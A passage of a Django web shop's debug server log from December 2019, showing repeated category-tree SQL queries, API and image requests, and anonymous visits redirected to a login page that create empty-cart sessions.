"shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:36:31,911 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:36:31,915 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:36:31,919 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:36:31,923 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:36:31] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 13:36:32] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [07/Dec/2019 13:36:32] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [07/Dec/2019 13:36:32] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [07/Dec/2019 13:36:32] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 304 0 [07/Dec/2019 13:36:32] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [07/Dec/2019 13:36:32] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 304 0 [07/Dec/2019 13:36:32] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [07/Dec/2019 13:36:32] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 304 0 [07/Dec/2019 13:36:32] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 [07/Dec/2019 13:36:32] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 DEBUG 2019-12-07 13:36:54,654 utils 32196 139885061072640 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:36:54,660 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:36:54,662 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:36:54,665 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:36:54,668 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:36:54,672 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:36:54,675 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:36:54,678 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:36:54,681 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:36:54,684 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:36:54,686 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:36:54] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 13:37:37] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:38:37,390 utils 32196 139885061072640 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:38:37,397 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:38:37,402 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:38:37,405 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:38:37,408 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:38:37,412 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:38:37,415 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:38:37,419 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:38:37,422 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:38:37,426 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:38:37,429 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:38:37] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 13:38:37] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [07/Dec/2019 13:38:38] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 [07/Dec/2019 13:38:38] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [07/Dec/2019 13:38:38] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [07/Dec/2019 13:38:38] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [07/Dec/2019 13:38:38] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 Not Found: /robots.txt [07/Dec/2019 13:38:41] "GET /robots.txt HTTP/1.0" 404 6624 [07/Dec/2019 13:38:55] "GET / HTTP/1.0" 302 0 [07/Dec/2019 13:41:20] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:41:20,594 utils 32196 139885050582784 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'cgu9bwre03fkg7fknbzpe9ztenar92xe' LIMIT 1; args=('cgu9bwre03fkg7fknbzpe9ztenar92xe',) DEBUG 2019-12-07 13:41:20,597 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('cgu9bwre03fkg7fknbzpe9ztenar92xe', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T13:41:20.595539+00:00'::timestamptz); args=('cgu9bwre03fkg7fknbzpe9ztenar92xe', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 13, 41, 20, 595539, tzinfo=)) [07/Dec/2019 13:41:20] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 13:41:21] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:41:21,893 utils 32196 139885050582784 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '5ce32e513sxjt4gp9o6aa6oke5v7wfp9' LIMIT 1; args=('5ce32e513sxjt4gp9o6aa6oke5v7wfp9',) DEBUG 2019-12-07 13:41:21,895 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('5ce32e513sxjt4gp9o6aa6oke5v7wfp9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T13:41:21.894027+00:00'::timestamptz); args=('5ce32e513sxjt4gp9o6aa6oke5v7wfp9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 13, 41, 21, 894027, tzinfo=)) [07/Dec/2019 13:41:21] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 13:41:22] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:41:22,244 utils 32196 139885050582784 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2c0dlw5uig09j6jq2nab8909tyftayqf' LIMIT 1; args=('2c0dlw5uig09j6jq2nab8909tyftayqf',) DEBUG 2019-12-07 13:41:22,247 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('2c0dlw5uig09j6jq2nab8909tyftayqf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T13:41:22.245026+00:00'::timestamptz); args=('2c0dlw5uig09j6jq2nab8909tyftayqf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 13, 41, 22, 245026, tzinfo=)) [07/Dec/2019 13:41:22] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 13:41:22] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:41:22,494 utils 32196 139885050582784 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'cqqywf1mfts9gc85fxjmg9tz9gr5uv8a' LIMIT 1; args=('cqqywf1mfts9gc85fxjmg9tz9gr5uv8a',) DEBUG 2019-12-07 13:41:22,496 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('cqqywf1mfts9gc85fxjmg9tz9gr5uv8a', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T13:41:22.495343+00:00'::timestamptz); args=('cqqywf1mfts9gc85fxjmg9tz9gr5uv8a', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 13, 41, 22, 495343, tzinfo=)) [07/Dec/2019 13:41:22] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 13:41:23] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:41:23,917 utils 32196 139885050582784 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ntk63zeglubr8fmy101c3gfcjohnoxnq' LIMIT 1; args=('ntk63zeglubr8fmy101c3gfcjohnoxnq',) DEBUG 2019-12-07 13:41:23,920 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ntk63zeglubr8fmy101c3gfcjohnoxnq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T13:41:23.918619+00:00'::timestamptz); args=('ntk63zeglubr8fmy101c3gfcjohnoxnq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 13, 41, 23, 918619, tzinfo=)) [07/Dec/2019 13:41:23] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 13:41:25] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:41:25,906 utils 32196 139885050582784 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'dnilice6wk0y76fsse6jx71s50af2qkv' LIMIT 1; args=('dnilice6wk0y76fsse6jx71s50af2qkv',) DEBUG 2019-12-07 13:41:25,909 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('dnilice6wk0y76fsse6jx71s50af2qkv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T13:41:25.907245+00:00'::timestamptz); args=('dnilice6wk0y76fsse6jx71s50af2qkv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 13, 41, 25, 907245, tzinfo=)) [07/Dec/2019 13:41:25] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 13:41:26] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:41:26,430 utils 32196 139885050582784 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '85zbo4fshdufma93ppez97mxe3t6b83e' LIMIT 1; args=('85zbo4fshdufma93ppez97mxe3t6b83e',) DEBUG 2019-12-07 13:41:26,431 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('85zbo4fshdufma93ppez97mxe3t6b83e', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T13:41:26.430428+00:00'::timestamptz); args=('85zbo4fshdufma93ppez97mxe3t6b83e', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 13, 41, 26, 430428, tzinfo=)) [07/Dec/2019 13:41:26] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 13:41:26] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:41:27,039 utils 32196 139885050582784 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '0p8zsb7s7iu1tha5b474d1culmxcnm6f' LIMIT 1; args=('0p8zsb7s7iu1tha5b474d1culmxcnm6f',) DEBUG 2019-12-07 13:41:27,041 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('0p8zsb7s7iu1tha5b474d1culmxcnm6f', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T13:41:27.040093+00:00'::timestamptz); args=('0p8zsb7s7iu1tha5b474d1culmxcnm6f', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 13, 41, 27, 40093, tzinfo=)) [07/Dec/2019 13:41:27] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 13:41:27] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:41:27,309 utils 32196 139885050582784 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '11ykpv5ckujb7idthq0wvyh79qi1u7ph' LIMIT 1; args=('11ykpv5ckujb7idthq0wvyh79qi1u7ph',) DEBUG 2019-12-07 13:41:27,311 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('11ykpv5ckujb7idthq0wvyh79qi1u7ph', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T13:41:27.309701+00:00'::timestamptz); args=('11ykpv5ckujb7idthq0wvyh79qi1u7ph', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 13, 41, 27, 309701, tzinfo=)) [07/Dec/2019 13:41:27] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 13:41:27] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:41:27,999 utils 32196 139885050582784 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'hso8z317i0935wxntncojwhk36v3cyya' LIMIT 1; args=('hso8z317i0935wxntncojwhk36v3cyya',) DEBUG 2019-12-07 13:41:28,002 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('hso8z317i0935wxntncojwhk36v3cyya', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T13:41:28.000010+00:00'::timestamptz); args=('hso8z317i0935wxntncojwhk36v3cyya', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 13, 41, 28, 10, tzinfo=)) [07/Dec/2019 13:41:28] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 13:41:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:41:28,244 utils 32196 139885050582784 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'luo4y2j3juwb0e7l3w826o08w21pxrqu' LIMIT 1; args=('luo4y2j3juwb0e7l3w826o08w21pxrqu',) DEBUG 2019-12-07 13:41:28,246 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('luo4y2j3juwb0e7l3w826o08w21pxrqu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T13:41:28.245332+00:00'::timestamptz); args=('luo4y2j3juwb0e7l3w826o08w21pxrqu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 13, 41, 28, 245332, tzinfo=)) [07/Dec/2019 13:41:28] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 13:42:40] "GET / HTTP/1.0" 302 0 [07/Dec/2019 13:47:43] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:48:13,823 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:48:13,828 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:48:13,830 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:48:13,832 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:48:13,834 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:48:13,836 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:48:13,838 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:48:13,840 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:48:13,843 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:48:13,845 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:48:13,847 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", 